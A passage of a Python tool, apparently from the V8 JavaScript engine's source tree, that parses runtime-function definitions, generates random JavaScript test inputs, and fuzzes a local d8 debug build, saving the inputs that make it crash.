"TypedArrayInitializeFromArrayLike": [None, 6, None, None, None],
"TypedArraySetFastCases": [None, None, "0", None],
}
# Types of arguments that cannot be generated in a JavaScript testcase.
NON_JS_TYPES = [
"Code", "Context", "FixedArray", "FunctionTemplateInfo",
"JSFunctionResultCache", "JSMessageObject", "Map", "ScopeInfo",
"SharedFunctionInfo"]
class Generator(object):
def RandomVariable(self, varname, vartype, simple):
if simple:
return self._Variable(varname, self.GENERATORS[vartype][0])
return self.GENERATORS[vartype][1](self, varname,
self.DEFAULT_RECURSION_BUDGET)
@staticmethod
def IsTypeSupported(typename):
return typename in Generator.GENERATORS
USUAL_SUSPECT_PROPERTIES = ["size", "length", "byteLength", "__proto__",
"prototype", "0", "1", "-1"]
DEFAULT_RECURSION_BUDGET = 2
PROXY_TRAPS = """{
getOwnPropertyDescriptor: function(name) {
return {value: function() {}, configurable: true, writable: true,
enumerable: true};
},
getPropertyDescriptor: function(name) {
return {value: function() {}, configurable: true, writable: true,
enumerable: true};
},
getOwnPropertyNames: function() { return []; },
getPropertyNames: function() { return []; },
defineProperty: function(name, descriptor) {},
delete: function(name) { return true; },
fix: function() {}
}"""
def _Variable(self, name, value, fallback=None):
args = { "name": name, "value": value, "fallback": fallback }
if fallback:
wrapper = "try { %%s } catch(e) { var %(name)s = %(fallback)s; }" % args
else:
wrapper = "%s"
return [wrapper % ("var %(name)s = %(value)s;" % args)]
def _Boolean(self, name, recursion_budget):
return self._Variable(name, random.choice(["true", "false"]))
def _Oddball(self, name, recursion_budget):
return self._Variable(name,
random.choice(["true", "false", "undefined", "null"]))
def _StrictMode(self, name, recursion_budget):
return self._Variable(name, random.choice([0, 1]))
def _Int32(self, name, recursion_budget=0):
die = random.random()
if die < 0.5:
value = random.choice([-3, -1, 0, 1, 2, 10, 515, 0x3fffffff, 0x7fffffff,
0x40000000, -0x40000000, -0x80000000])
elif die < 0.75:
value = random.randint(-1000, 1000)
else:
value = random.randint(-0x80000000, 0x7fffffff)
return self._Variable(name, value)
def _Uint32(self, name, recursion_budget=0):
die = random.random()
if die < 0.5:
value = random.choice([0, 1, 2, 3, 4, 8, 0x3fffffff, 0x40000000,
0x7fffffff, 0xffffffff])
elif die < 0.75:
value = random.randint(0, 1000)
else:
value = random.randint(0, 0xffffffff)
return self._Variable(name, value)
def _Smi(self, name, recursion_budget):
die = random.random()
if die < 0.5:
value = random.choice([-5, -1, 0, 1, 2, 3, 0x3fffffff, -0x40000000])
elif die < 0.75:
value = random.randint(-1000, 1000)
else:
value = random.randint(-0x40000000, 0x3fffffff)
return self._Variable(name, value)
def _Number(self, name, recursion_budget):
die = random.random()
if die < 0.5:
return self._Smi(name, recursion_budget)
elif die < 0.6:
value = random.choice(["Infinity", "-Infinity", "NaN", "-0",
"1.7976931348623157e+308", # Max value.
"2.2250738585072014e-308", # Min value.
"4.9406564584124654e-324"]) # Min subnormal.
else:
value = random.lognormvariate(0, 15)
return self._Variable(name, value)
def _RawRandomString(self, minlength=0, maxlength=100,
alphabet=string.ascii_letters):
length = random.randint(minlength, maxlength)
result = ""
for i in xrange(length):
result += random.choice(alphabet)
return result
def _SeqString(self, name, recursion_budget):
s1 = self._RawRandomString(1, 5)
s2 = self._RawRandomString(1, 5)
# 'foo' + 'bar'
return self._Variable(name, "\"%s\" + \"%s\"" % (s1, s2))
def _SeqTwoByteString(self, name):
s1 = self._RawRandomString(1, 5)
s2 = self._RawRandomString(1, 5)
# 'foo' + unicode + 'bar'
return self._Variable(name, "\"%s\" + \"\\2082\" + \"%s\"" % (s1, s2))
def _SlicedString(self, name):
s = self._RawRandomString(20, 30)
# 'ffoo12345678901234567890'.substr(1)
return self._Variable(name, "\"%s\".substr(1)" % s)
def _ConsString(self, name):
s1 = self._RawRandomString(8, 15)
s2 = self._RawRandomString(8, 15)
# 'foo12345' + (function() { return 'bar12345';})()
return self._Variable(name,
"\"%s\" + (function() { return \"%s\";})()" % (s1, s2))
def _InternalizedString(self, name):
return self._Variable(name, "\"%s\"" % self._RawRandomString(0, 20))
def _String(self, name, recursion_budget):
die = random.random()
if die < 0.5:
string = random.choice(self.USUAL_SUSPECT_PROPERTIES)
return self._Variable(name, "\"%s\"" % string)
elif die < 0.6:
number_name = name + "_number"
result = self._Number(number_name, recursion_budget)
return result + self._Variable(name, "\"\" + %s" % number_name)
elif die < 0.7:
return self._SeqString(name, recursion_budget)
elif die < 0.8:
return self._ConsString(name)
elif die < 0.9:
return self._InternalizedString(name)
else:
return self._SlicedString(name)
def _Symbol(self, name, recursion_budget):
raw_string_name = name + "_1"
result = self._String(raw_string_name, recursion_budget)
return result + self._Variable(name, "Symbol(%s)" % raw_string_name)
def _Name(self, name, recursion_budget):
if random.random() < 0.2:
return self._Symbol(name, recursion_budget)
return self._String(name, recursion_budget)
def _JSValue(self, name, recursion_budget):
die = random.random()
raw_name = name + "_1"
if die < 0.33:
result = self._String(raw_name, recursion_budget)
return result + self._Variable(name, "new String(%s)" % raw_name)
elif die < 0.66:
result = self._Boolean(raw_name, recursion_budget)
return result + self._Variable(name, "new Boolean(%s)" % raw_name)
else:
result = self._Number(raw_name, recursion_budget)
return result + self._Variable(name, "new Number(%s)" % raw_name)
def _RawRandomPropertyName(self):
if random.random() < 0.5:
return random.choice(self.USUAL_SUSPECT_PROPERTIES)
return self._RawRandomString(0, 10)
def _AddProperties(self, name, result, recursion_budget):
propcount = random.randint(0, 3)
propname = None
for i in range(propcount):
die = random.random()
if die < 0.5:
propname = "%s_prop%d" % (name, i)
result += self._Name(propname, recursion_budget - 1)
else:
propname = "\"%s\"" % self._RawRandomPropertyName()
propvalue_name = "%s_val%d" % (name, i)
result += self._Object(propvalue_name, recursion_budget - 1)
result.append("try { %s[%s] = %s; } catch (e) {}" %
(name, propname, propvalue_name))
if random.random() < 0.2 and propname:
# Force the object to slow mode.
result.append("delete %s[%s];" % (name, propname))
def _RandomElementIndex(self, element_name, result):
if random.random() < 0.5:
return random.randint(-1000, 1000)
result += self._Smi(element_name, 0)
return element_name
def _AddElements(self, name, result, recursion_budget):
elementcount = random.randint(0, 3)
for i in range(elementcount):
element_name = "%s_idx%d" % (name, i)
index = self._RandomElementIndex(element_name, result)
value_name = "%s_elt%d" % (name, i)
result += self._Object(value_name, recursion_budget - 1)
result.append("try { %s[%s] = %s; } catch(e) {}" %
(name, index, value_name))
def _AddAccessors(self, name, result, recursion_budget):
accessorcount = random.randint(0, 3)
for i in range(accessorcount):
propname = self._RawRandomPropertyName()
what = random.choice(["get", "set"])
function_name = "%s_access%d" % (name, i)
result += self._PlainFunction(function_name, recursion_budget - 1)
result.append("try { Object.defineProperty(%s, \"%s\", {%s: %s}); } "
"catch (e) {}" % (name, propname, what, function_name))
def _PlainArray(self, name, recursion_budget):
die = random.random()
if die < 0.5:
literal = random.choice(["[]", "[1, 2]", "[1.5, 2.5]",
"['a', 'b', 1, true]"])
return self._Variable(name, literal)
else:
new = random.choice(["", "new "])
length = random.randint(0, 101000)
return self._Variable(name, "%sArray(%d)" % (new, length))
def _PlainObject(self, name, recursion_budget):
die = random.random()
if die < 0.67:
literal_propcount = random.randint(0, 3)
properties = []
result = []
for i in range(literal_propcount):
propname = self._RawRandomPropertyName()
propvalue_name = "%s_lit%d" % (name, i)
result += self._Object(propvalue_name, recursion_budget - 1)
properties.append("\"%s\": %s" % (propname, propvalue_name))
return result + self._Variable(name, "{%s}" % ", ".join(properties))
else:
return self._Variable(name, "new Object()")
def _JSArray(self, name, recursion_budget):
result = self._PlainArray(name, recursion_budget)
self._AddAccessors(name, result, recursion_budget)
self._AddProperties(name, result, recursion_budget)
self._AddElements(name, result, recursion_budget)
return result
def _RawRandomBufferLength(self):
if random.random() < 0.2:
return random.choice([0, 1, 8, 0x40000000, 0x80000000])
return random.randint(0, 1000)
def _JSArrayBuffer(self, name, recursion_budget):
length = self._RawRandomBufferLength()
return self._Variable(name, "new ArrayBuffer(%d)" % length)
def _JSDataView(self, name, recursion_budget):
buffer_name = name + "_buffer"
result = self._JSArrayBuffer(buffer_name, recursion_budget)
args = [buffer_name]
die = random.random()
if die < 0.67:
offset = self._RawRandomBufferLength()
args.append("%d" % offset)
if die < 0.33:
length = self._RawRandomBufferLength()
args.append("%d" % length)
result += self._Variable(name, "new DataView(%s)" % ", ".join(args),
fallback="new DataView(new ArrayBuffer(8))")
return result
def _JSDate(self, name, recursion_budget):
die = random.random()
if die < 0.25:
return self._Variable(name, "new Date()")
elif die < 0.5:
ms_name = name + "_ms"
result = self._Number(ms_name, recursion_budget)
return result + self._Variable(name, "new Date(%s)" % ms_name)
elif die < 0.75:
str_name = name + "_str"
month = random.choice(["Jan", "Feb", "Mar", "Apr", "May", "Jun", "Jul",
"Aug", "Sep", "Oct", "Nov", "Dec"])
day = random.randint(1, 28)
year = random.randint(1900, 2100)
hour = random.randint(0, 23)
minute = random.randint(0, 59)
second = random.randint(0, 59)
str_value = ("\"%s %s, %s %s:%s:%s\"" %
(month, day, year, hour, minute, second))
result = self._Variable(str_name, str_value)
return result + self._Variable(name, "new Date(%s)" % str_name)
else:
components = tuple(map(lambda x: "%s_%s" % (name, x),
["y", "m", "d", "h", "min", "s", "ms"]))
return ([j for i in map(self._Int32, components) for j in i] +
self._Variable(name, "new Date(%s)" % ", ".join(components)))
def _PlainFunction(self, name, recursion_budget):
result_name = "result"
body = ["function() {"]
body += self._Object(result_name, recursion_budget - 1)
body.append("return result;\n}")
return self._Variable(name, "%s" % "\n".join(body))
def _JSFunction(self, name, recursion_budget):
result = self._PlainFunction(name, recursion_budget)
self._AddAccessors(name, result, recursion_budget)
self._AddProperties(name, result, recursion_budget)
self._AddElements(name, result, recursion_budget)
return result
def _JSFunctionProxy(self, name, recursion_budget):
# TODO(jkummerow): Revisit this as the Proxy implementation evolves.
return self._Variable(name, "Proxy.createFunction(%s, function() {})" %
self.PROXY_TRAPS)
def _JSGeneratorObject(self, name, recursion_budget):
# TODO(jkummerow): Be more creative here?
return self._Variable(name, "(function*() { yield 1; })()")
def _JSMap(self, name, recursion_budget, weak=""):
result = self._Variable(name, "new %sMap()" % weak)
num_entries = random.randint(0, 3)
for i in range(num_entries):
key_name = "%s_k%d" % (name, i)
value_name = "%s_v%d" % (name, i)
if weak:
result += self._JSObject(key_name, recursion_budget - 1)
else:
result += self._Object(key_name, recursion_budget - 1)
result += self._Object(value_name, recursion_budget - 1)
result.append("%s.set(%s, %s)" % (name, key_name, value_name))
return result
def _JSMapIterator(self, name, recursion_budget):
map_name = name + "_map"
result = self._JSMap(map_name, recursion_budget)
iterator_type = random.choice(['keys', 'values', 'entries'])
return (result + self._Variable(name, "%s.%s()" %
(map_name, iterator_type)))
def _JSProxy(self, name, recursion_budget):
# TODO(jkummerow): Revisit this as the Proxy implementation evolves.
return self._Variable(name, "Proxy.create(%s)" % self.PROXY_TRAPS)
def _JSRegExp(self, name, recursion_budget):
flags = random.choice(["", "g", "i", "m", "gi"])
string = "a(b|c)*a" # TODO(jkummerow): Be more creative here?
ctor = random.choice(["/%s/%s", "new RegExp(\"%s\", \"%s\")"])
return self._Variable(name, ctor % (string, flags))
def _JSSet(self, name, recursion_budget, weak=""):
result = self._Variable(name, "new %sSet()" % weak)
num_entries = random.randint(0, 3)
for i in range(num_entries):
element_name = "%s_e%d" % (name, i)
if weak:
result += self._JSObject(element_name, recursion_budget - 1)
else:
result += self._Object(element_name, recursion_budget - 1)
result.append("%s.add(%s)" % (name, element_name))
return result
def _JSSetIterator(self, name, recursion_budget):
set_name = name + "_set"
result = self._JSSet(set_name, recursion_budget)
iterator_type = random.choice(['values', 'entries'])
return (result + self._Variable(name, "%s.%s()" %
(set_name, iterator_type)))
def _JSTypedArray(self, name, recursion_budget):
arraytype = random.choice(["Int8", "Int16", "Int32", "Uint8", "Uint16",
"Uint32", "Float32", "Float64", "Uint8Clamped"])
ctor_type = random.randint(0, 3)
if ctor_type == 0:
length = random.randint(0, 1000)
return self._Variable(name, "new %sArray(%d)" % (arraytype, length),
fallback="new %sArray(8)" % arraytype)
elif ctor_type == 1:
input_name = name + "_typedarray"
result = self._JSTypedArray(input_name, recursion_budget - 1)
return (result +
self._Variable(name, "new %sArray(%s)" % (arraytype, input_name),
fallback="new %sArray(8)" % arraytype))
elif ctor_type == 2:
arraylike_name = name + "_arraylike"
result = self._JSObject(arraylike_name, recursion_budget - 1)
length = random.randint(0, 1000)
result.append("try { %s.length = %d; } catch(e) {}" %
(arraylike_name, length))
return (result +
self._Variable(name,
"new %sArray(%s)" % (arraytype, arraylike_name),
fallback="new %sArray(8)" % arraytype))
else:
die = random.random()
buffer_name = name + "_buffer"
args = [buffer_name]
result = self._JSArrayBuffer(buffer_name, recursion_budget)
if die < 0.67:
offset_name = name + "_offset"
args.append(offset_name)
result += self._Int32(offset_name)
if die < 0.33:
length_name = name + "_length"
args.append(length_name)
result += self._Int32(length_name)
return (result +
self._Variable(name,
"new %sArray(%s)" % (arraytype, ", ".join(args)),
fallback="new %sArray(8)" % arraytype))
def _JSArrayBufferView(self, name, recursion_budget):
if random.random() < 0.4:
return self._JSDataView(name, recursion_budget)
else:
return self._JSTypedArray(name, recursion_budget)
def _JSWeakCollection(self, name, recursion_budget):
ctor = random.choice([self._JSMap, self._JSSet])
return ctor(name, recursion_budget, weak="Weak")
def _PropertyDetails(self, name, recursion_budget):
# TODO(jkummerow): Be more clever here?
return self._Int32(name)
def _JSObject(self, name, recursion_budget):
die = random.random()
if die < 0.4:
function = random.choice([self._PlainObject, self._PlainArray,
self._PlainFunction])
elif die < 0.5:
return self._Variable(name, "this") # Global object.
else:
function = random.choice([self._JSArrayBuffer, self._JSDataView,
self._JSDate, self._JSFunctionProxy,
self._JSGeneratorObject, self._JSMap,
self._JSMapIterator, self._JSRegExp,
self._JSSet, self._JSSetIterator,
self._JSTypedArray, self._JSValue,
self._JSWeakCollection])
result = function(name, recursion_budget)
self._AddAccessors(name, result, recursion_budget)
self._AddProperties(name, result, recursion_budget)
self._AddElements(name, result, recursion_budget)
return result
def _JSReceiver(self, name, recursion_budget):
if random.random() < 0.9: return self._JSObject(name, recursion_budget)
return self._JSProxy(name, recursion_budget)
def _HeapObject(self, name, recursion_budget):
die = random.random()
if die < 0.9: return self._JSReceiver(name, recursion_budget)
elif die < 0.95: return self._Oddball(name, recursion_budget)
else: return self._Name(name, recursion_budget)
def _Object(self, name, recursion_budget):
if recursion_budget <= 0:
function = random.choice([self._Oddball, self._Number, self._Name,
self._JSValue, self._JSRegExp])
return function(name, recursion_budget)
if random.random() < 0.2:
return self._Smi(name, recursion_budget)
return self._HeapObject(name, recursion_budget)
GENERATORS = {
"Boolean": ["true", _Boolean],
"HeapObject": ["new Object()", _HeapObject],
"Int32": ["32", _Int32],
"JSArray": ["new Array()", _JSArray],
"JSArrayBuffer": ["new ArrayBuffer(8)", _JSArrayBuffer],
"JSArrayBufferView": ["new Int32Array(2)", _JSArrayBufferView],
"JSDataView": ["new DataView(new ArrayBuffer(24))", _JSDataView],
"JSDate": ["new Date()", _JSDate],
"JSFunction": ["function() {}", _JSFunction],
"JSFunctionProxy": ["Proxy.createFunction({}, function() {})",
_JSFunctionProxy],
"JSGeneratorObject": ["(function*(){ yield 1; })()", _JSGeneratorObject],
"JSMap": ["new Map()", _JSMap],
"JSMapIterator": ["new Map().entries()", _JSMapIterator],
"JSObject": ["new Object()", _JSObject],
"JSProxy": ["Proxy.create({})", _JSProxy],
"JSReceiver": ["new Object()", _JSReceiver],
"JSRegExp": ["/ab/g", _JSRegExp],
"JSSet": ["new Set()", _JSSet],
"JSSetIterator": ["new Set().values()", _JSSetIterator],
"JSTypedArray": ["new Int32Array(2)", _JSTypedArray],
"JSValue": ["new String('foo')", _JSValue],
"JSWeakCollection": ["new WeakMap()", _JSWeakCollection],
"Name": ["\"name\"", _Name],
"Number": ["1.5", _Number],
"Object": ["new Object()", _Object],
"PropertyDetails": ["513", _PropertyDetails],
"SeqOneByteString": ["\"seq 1-byte\"", _SeqString],
"SeqString": ["\"seqstring\"", _SeqString],
"SeqTwoByteString": ["\"seq \\u2082-byte\"", _SeqTwoByteString],
"Smi": ["1", _Smi],
"StrictMode": ["1", _StrictMode],
"String": ["\"foo\"", _String],
"Symbol": ["Symbol(\"symbol\")", _Symbol],
"Uint32": ["32", _Uint32],
}
class ArgParser(object):
def __init__(self, regex, ctor):
self.regex = regex
self.ArgCtor = ctor
class Arg(object):
def __init__(self, typename, varname, index):
self.type = typename
self.name = "_%s" % varname
self.index = index
class Function(object):
def __init__(self, match):
self.name = match.group(1)
self.argslength = -1
self.args = {}
self.inline = ""
handle_arg_parser = ArgParser(
re.compile("^\s*CONVERT_ARG_HANDLE_CHECKED\((\w+), (\w+), (\d+)\)"),
lambda match: Arg(match.group(1), match.group(2), int(match.group(3))))
plain_arg_parser = ArgParser(
re.compile("^\s*CONVERT_ARG_CHECKED\((\w+), (\w+), (\d+)\)"),
lambda match: Arg(match.group(1), match.group(2), int(match.group(3))))
number_handle_arg_parser = ArgParser(
re.compile("^\s*CONVERT_NUMBER_ARG_HANDLE_CHECKED\((\w+), (\d+)\)"),
lambda match: Arg("Number", match.group(1), int(match.group(2))))
smi_arg_parser = ArgParser(
re.compile("^\s*CONVERT_SMI_ARG_CHECKED\((\w+), (\d+)\)"),
lambda match: Arg("Smi", match.group(1), int(match.group(2))))
double_arg_parser = ArgParser(
re.compile("^\s*CONVERT_DOUBLE_ARG_CHECKED\((\w+), (\d+)\)"),
lambda match: Arg("Number", match.group(1), int(match.group(2))))
number_arg_parser = ArgParser(
re.compile(
"^\s*CONVERT_NUMBER_CHECKED\(\w+, (\w+), (\w+), args\[(\d+)\]\)"),
lambda match: Arg(match.group(2), match.group(1), int(match.group(3))))
strict_mode_arg_parser = ArgParser(
re.compile("^\s*CONVERT_STRICT_MODE_ARG_CHECKED\((\w+), (\d+)\)"),
lambda match: Arg("StrictMode", match.group(1), int(match.group(2))))
boolean_arg_parser = ArgParser(
re.compile("^\s*CONVERT_BOOLEAN_ARG_CHECKED\((\w+), (\d+)\)"),
lambda match: Arg("Boolean", match.group(1), int(match.group(2))))
property_details_parser = ArgParser(
re.compile("^\s*CONVERT_PROPERTY_DETAILS_CHECKED\((\w+), (\d+)\)"),
lambda match: Arg("PropertyDetails", match.group(1), int(match.group(2))))
arg_parsers = [handle_arg_parser, plain_arg_parser, number_handle_arg_parser,
smi_arg_parser,
double_arg_parser, number_arg_parser, strict_mode_arg_parser,
boolean_arg_parser, property_details_parser]
def SetArgsLength(self, match):
self.argslength = int(match.group(1))
def TryParseArg(self, line):
for parser in Function.arg_parsers:
match = parser.regex.match(line)
if match:
arg = parser.ArgCtor(match)
self.args[arg.index] = arg
return True
return False
def Filename(self):
return "%s.js" % self.name.lower()
def __str__(self):
s = [self.name, "("]
argcount = self.argslength
if argcount < 0:
print("WARNING: unknown argslength for function %s" % self.name)
if self.args:
argcount = max([self.args[i].index + 1 for i in self.args])
else:
argcount = 0
for i in range(argcount):
if i > 0: s.append(", ")
s.append(self.args[i].type if i in self.args else "<unknown>")
s.append(")")
return "".join(s)
class Macro(object):
def __init__(self, match):
self.name = match.group(1)
self.args = [s.strip() for s in match.group(2).split(",")]
self.lines = []
self.indentation = 0
self.AddLine(match.group(3))
def AddLine(self, line):
if not line: return
if not self.lines:
# This is the first line, detect indentation.
self.indentation = len(line) - len(line.lstrip())
line = line.rstrip("\\\n ")
if not line: return
assert len(line[:self.indentation].strip()) == 0, \
("expected whitespace: '%s', full line: '%s'" %
(line[:self.indentation], line))
line = line[self.indentation:]
if not line: return
self.lines.append(line + "\n")
def Finalize(self):
for arg in self.args:
pattern = re.compile(r"(##|\b)%s(##|\b)" % arg)
for i in range(len(self.lines)):
self.lines[i] = re.sub(pattern, "%%(%s)s" % arg, self.lines[i])
def FillIn(self, arg_values):
filler = {}
assert len(arg_values) == len(self.args)
for i in range(len(self.args)):
filler[self.args[i]] = arg_values[i]
result = []
for line in self.lines:
result.append(line % filler)
return result
# Parses HEADERFILENAME to find out which runtime functions are "inline".
def FindInlineRuntimeFunctions():
inline_functions = []
with open(HEADERFILENAME, "r") as f:
inline_list = "#define INLINE_FUNCTION_LIST(F) \\\n"
inline_function = re.compile(r"^\s*F\((\w+), \d+, \d+\)\s*\\?")
mode = "SEARCHING"
for line in f:
if mode == "ACTIVE":
match = inline_function.match(line)
if match:
inline_functions.append(match.group(1))
if not line.endswith("\\\n"):
mode = "SEARCHING"
elif mode == "SEARCHING":
if line == inline_list:
mode = "ACTIVE"
return inline_functions
def ReadFileAndExpandMacros(filename):
found_macros = {}
expanded_lines = []
with open(filename, "r") as f:
found_macro = None
for line in f:
if found_macro is not None:
found_macro.AddLine(line)
if not line.endswith("\\\n"):
found_macro.Finalize()
found_macro = None
continue
match = MACRO.match(line)
if match:
found_macro = Macro(match)
if found_macro.name in EXPAND_MACROS:
found_macros[found_macro.name] = found_macro
else:
found_macro = None
continue
match = FIRST_WORD.match(line)
if match:
first_word = match.group(1)
if first_word in found_macros:
MACRO_CALL = re.compile("%s\(([^)]*)\)" % first_word)
match = MACRO_CALL.match(line)
assert match
args = [s.strip() for s in match.group(1).split(",")]
expanded_lines += found_macros[first_word].FillIn(args)
continue
expanded_lines.append(line)
return expanded_lines
# Detects runtime functions by parsing FILENAME.
def FindRuntimeFunctions():
inline_functions = FindInlineRuntimeFunctions()
functions = []
expanded_lines = ReadFileAndExpandMacros(FILENAME)
function = None
partial_line = ""
for line in expanded_lines:
# Multi-line definition support, ignoring macros.
if line.startswith("RUNTIME_FUNCTION") and not line.endswith("{\n"):
if line.endswith("\\\n"): continue
partial_line = line.rstrip()
continue
if partial_line:
partial_line += " " + line.strip()
if partial_line.endswith("{"):
line = partial_line
partial_line = ""
else:
continue
match = FUNCTION.match(line)
if match:
function = Function(match)
if function.name in inline_functions:
function.inline = "_"
continue
if function is None: continue
match = ARGSLENGTH.match(line)
if match:
function.SetArgsLength(match)
continue
if function.TryParseArg(line):
continue
if line == FUNCTIONEND:
if function is not None:
functions.append(function)
function = None
return functions
# Hack: This must have the same fields as class Function above, because the
# two are used polymorphically in RunFuzzer(). We could use inheritance...
class Builtin(object):
def __init__(self, match):
self.name = match.group(1)
args = match.group(2)
self.argslength = 0 if args == "" else args.count(",") + 1
self.inline = ""
self.args = {}
if self.argslength > 0:
args = args.split(",")
for i in range(len(args)):
# a = args[i].strip() # TODO: filter out /* comments */ first.
a = ""
self.args[i] = Arg("Object", a, i)
def __str__(self):
return "%s(%d)" % (self.name, self.argslength)
def FindJSBuiltins():
PATH = "src"
fileslist = []
for (root, dirs, files) in os.walk(PATH):
for f in files:
if f.endswith(".js"):
fileslist.append(os.path.join(root, f))
builtins = []
regexp = re.compile("^function (\w+)\s*\((.*?)\) {")
matches = 0
for filename in fileslist:
with open(filename, "r") as f:
file_contents = f.read()
file_contents = js2c.ExpandInlineMacros(file_contents)
lines = file_contents.split("\n")
partial_line = ""
for line in lines:
if line.startswith("function") and not '{' in line:
partial_line += line.rstrip()
continue
if partial_line:
partial_line += " " + line.strip()
if '{' in line:
line = partial_line
partial_line = ""
else:
continue
match = regexp.match(line)
if match:
builtins.append(Builtin(match))
return builtins
# Classifies runtime functions.
def ClassifyFunctions(functions):
# Can be fuzzed with a JavaScript testcase.
js_fuzzable_functions = []
# We have enough information to fuzz these, but they need inputs that
# cannot be created or passed around in JavaScript.
cctest_fuzzable_functions = []
# This script does not have enough information about these.
unknown_functions = []
types = {}
for f in functions:
if f.name in BLACKLISTED:
continue
decision = js_fuzzable_functions
custom = CUSTOM_KNOWN_GOOD_INPUT.get(f.name, None)
if f.argslength < 0:
# Unknown length -> give up unless there's a custom definition.
if custom and custom[-1] is not None:
f.argslength = custom[-1]
assert len(custom) == f.argslength + 1, \
("%s: last custom definition must be argslength" % f.name)
else:
decision = unknown_functions
else:
if custom:
# Any custom definitions must match the known argslength.
assert len(custom) == f.argslength + 1, \
("%s should have %d custom definitions but has %d" %
(f.name, f.argslength + 1, len(custom)))
for i in range(f.argslength):
if custom and custom[i] is not None:
# All good, there's a custom definition.
pass
elif not i in f.args:
# No custom definition and no parse result -> give up.
decision = unknown_functions
else:
t = f.args[i].type
if t in NON_JS_TYPES:
decision = cctest_fuzzable_functions
else:
assert Generator.IsTypeSupported(t), \
("type generator not found for %s, function: %s" % (t, f))
decision.append(f)
return (js_fuzzable_functions, cctest_fuzzable_functions, unknown_functions)
def _GetKnownGoodArgs(function, generator):
custom_input = CUSTOM_KNOWN_GOOD_INPUT.get(function.name, None)
definitions = []
argslist = []
for i in range(function.argslength):
if custom_input and custom_input[i] is not None:
name = "arg%d" % i
definitions.append("var %s = %s;" % (name, custom_input[i]))
else:
arg = function.args[i]
name = arg.name
definitions += generator.RandomVariable(name, arg.type, simple=True)
argslist.append(name)
return (definitions, argslist)
def _GenerateTestcase(function, definitions, argslist, throws):
s = ["// Copyright 2014 the V8 project authors. All rights reserved.",
"// AUTO-GENERATED BY tools/generate-runtime-tests.py, DO NOT MODIFY",
"// Flags: --allow-natives-syntax --harmony"] + definitions
call = "%%%s%s(%s);" % (function.inline, function.name, ", ".join(argslist))
if throws:
s.append("try {")
s.append(call);
s.append("} catch(e) {}")
else:
s.append(call)
testcase = "\n".join(s)
return testcase
def GenerateJSTestcaseForFunction(function):
gen = Generator()
(definitions, argslist) = _GetKnownGoodArgs(function, gen)
testcase = _GenerateTestcase(function, definitions, argslist,
function.name in THROWS)
path = os.path.join(BASEPATH, function.Filename())
with open(path, "w") as f:
f.write("%s\n" % testcase)
def GenerateTestcases(functions):
shutil.rmtree(BASEPATH) # Re-generate everything.
os.makedirs(BASEPATH)
for f in functions:
GenerateJSTestcaseForFunction(f)
def _SaveFileName(save_path, process_id, save_file_index):
return "%s/fuzz_%d_%d.js" % (save_path, process_id, save_file_index)
def _GetFuzzableRuntimeFunctions():
functions = FindRuntimeFunctions()
(js_fuzzable_functions, cctest_fuzzable_functions, unknown_functions) = \
ClassifyFunctions(functions)
return js_fuzzable_functions
FUZZ_TARGET_LISTS = {
"runtime": _GetFuzzableRuntimeFunctions,
"builtins": FindJSBuiltins,
}
def RunFuzzer(process_id, options, stop_running):
MAX_SLEEP_TIME = 0.1
INITIAL_SLEEP_TIME = 0.001
SLEEP_TIME_FACTOR = 1.25
base_file_name = "/dev/shm/runtime_fuzz_%d" % process_id
test_file_name = "%s.js" % base_file_name
stderr_file_name = "%s.out" % base_file_name
save_file_index = 0
while os.path.exists(_SaveFileName(options.save_path, process_id,
save_file_index)):
save_file_index += 1
targets = FUZZ_TARGET_LISTS[options.fuzz_target]()
try:
for i in range(options.num_tests):
if stop_running.is_set(): break
function = None
while function is None or function.argslength == 0:
function = random.choice(targets)
args = []
definitions = []
gen = Generator()
for i in range(function.argslength):
arg = function.args[i]
argname = "arg%d%s" % (i, arg.name)
args.append(argname)
definitions += gen.RandomVariable(argname, arg.type, simple=False)
testcase = _GenerateTestcase(function, definitions, args, True)
with open(test_file_name, "w") as f:
f.write("%s\n" % testcase)
with open("/dev/null", "w") as devnull:
with open(stderr_file_name, "w") as stderr:
process = subprocess.Popen(
[options.binary, "--allow-natives-syntax", "--harmony",
"--enable-slow-asserts", test_file_name],
stdout=devnull, stderr=stderr)
end_time = time.time() + options.timeout
timed_out = False
exit_code = None
sleep_time = INITIAL_SLEEP_TIME
while exit_code is None:
if time.time() >= end_time:
# Kill the process and wait for it to exit.
os.kill(process.pid, signal.SIGTERM)
exit_code = process.wait()
timed_out = True
else:
exit_code = process.poll()
time.sleep(sleep_time)
sleep_time = sleep_time * SLEEP_TIME_FACTOR
if sleep_time > MAX_SLEEP_TIME:
sleep_time = MAX_SLEEP_TIME
if exit_code != 0 and not timed_out:
oom = False
with open(stderr_file_name, "r") as stderr:
for line in stderr:
if line.strip() == "# Allocation failed - process out of memory":
oom = True
break
if oom: continue
save_name = _SaveFileName(options.save_path, process_id,
save_file_index)
shutil.copyfile(test_file_name, save_name)
save_file_index += 1
except KeyboardInterrupt:
stop_running.set()
finally:
if os.path.exists(test_file_name):
os.remove(test_file_name)
if os.path.exists(stderr_file_name):
os.remove(stderr_file_name)
def BuildOptionParser():
usage = """Usage: %%prog [options] ACTION
where ACTION can be:
info Print diagnostic info.
check Check that runtime functions can be parsed as expected, and that
test cases exist.
generate Parse source code for runtime functions, and auto-generate
test cases for them. Warning: this will nuke and re-create
%(path)s.
fuzz Generate fuzz tests, run them, save those that crashed (see options).
""" % {"path": os.path.relpath(BASEPATH)}
o = optparse.OptionParser(usage=usage)
o.add_option("--binary", default="out/x64.debug/d8",
help="d8 binary used for running fuzz tests (default: %default)")
o.add_option("--fuzz-target", default="runtime",
help="Set of functions targeted by fuzzing. Allowed values: "
"%s (default: %%default)" % ", ".join(FUZZ_TARGET_LISTS))
o.add_option("-n", "--num-tests", default=1000, type="int",
help="Number of fuzz tests to generate per worker process"
" (default: %default)")
o.add_option("--save-path", default="~/runtime_fuzz_output",
help="Path to directory where failing tests will be stored"
" (default: %default)")
o.add_option("--timeout", default=20, type="int",
help="Timeout for each fuzz test (in seconds, default:"
"%default)")
return o
def ProcessOptions(options, args):
options.save_path = os.path.expanduser(options.save_path)
if options.fuzz_target not in FUZZ_TARGET_LISTS:
print("Invalid fuzz target: %s" % options.fuzz_target)
return False
if len(args) != 1 or args[0] == "help":
return False
return True
def Main():
parser = BuildOptionParser()
(options, args) = parser.parse_args()
if not ProcessOptions(options, args):
parser.print_help()
return 1
action = args[0]
functions = FindRuntimeFunctions()
(js_fuzzable_functions, cctest_fuzzable_functions, unknown_functions) = \
ClassifyFunctions(functions)
builtins = FindJSBuiltins()
if action == "test":
print("put your temporary debugging code here")
return 0
if action == "info":
